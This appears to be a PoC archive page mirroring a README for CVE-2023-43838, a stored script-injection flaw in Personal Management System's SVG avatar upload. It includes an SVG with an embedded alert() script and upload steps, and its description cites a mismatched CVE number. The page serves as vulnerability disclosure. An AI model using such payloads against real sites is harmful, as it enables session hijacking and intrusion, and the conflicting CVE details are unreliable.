Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1020 CNY

100%
Buy Us a Coffee

CVE-2023-43838 PoC — Personal Management System 代码问题漏洞

Source
https://github.com/rootd4ddy/CVE-2023-43838
Associated Vulnerability
Title:Personal Management System 代码问题漏洞 (CVE-2023-43838)
Description:An arbitrary file upload vulnerability in Personal Management System v1.4.64 allows attackers to execute arbitrary code via uploading a crafted SVG file into a user profile's avatar.
Description
Public disclosure for CVE-2023-31584.
Readme
# CVE-2023-43838

An arbitrary file upload vulnerability in Personal Management System
 v1.4.64 allows attackers to execute arbitrary code via uploading a
 crafted SVG file into a user profile's avatar.

 ------------------------------------------

 [Additional Information]
 1.) Create alert.svg with the following content:

```
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
    <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
    <script type="text/javascript">
       alert("huntr.dev");
    </script>
 </svg>
```


2.) Host .SVG on webserver.

3.) Upload .SVG as avatar image.
4.) When a user opens the avatar in a seperate tab, javascript stored in the .SVG file is executed.


References:
https://github.com/Volmarg/personal-management-system
File Snapshot

 [4.0K]  /data/pocs/a43509edb2d8488655f272e868606300d80e300a
└── [ 824]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →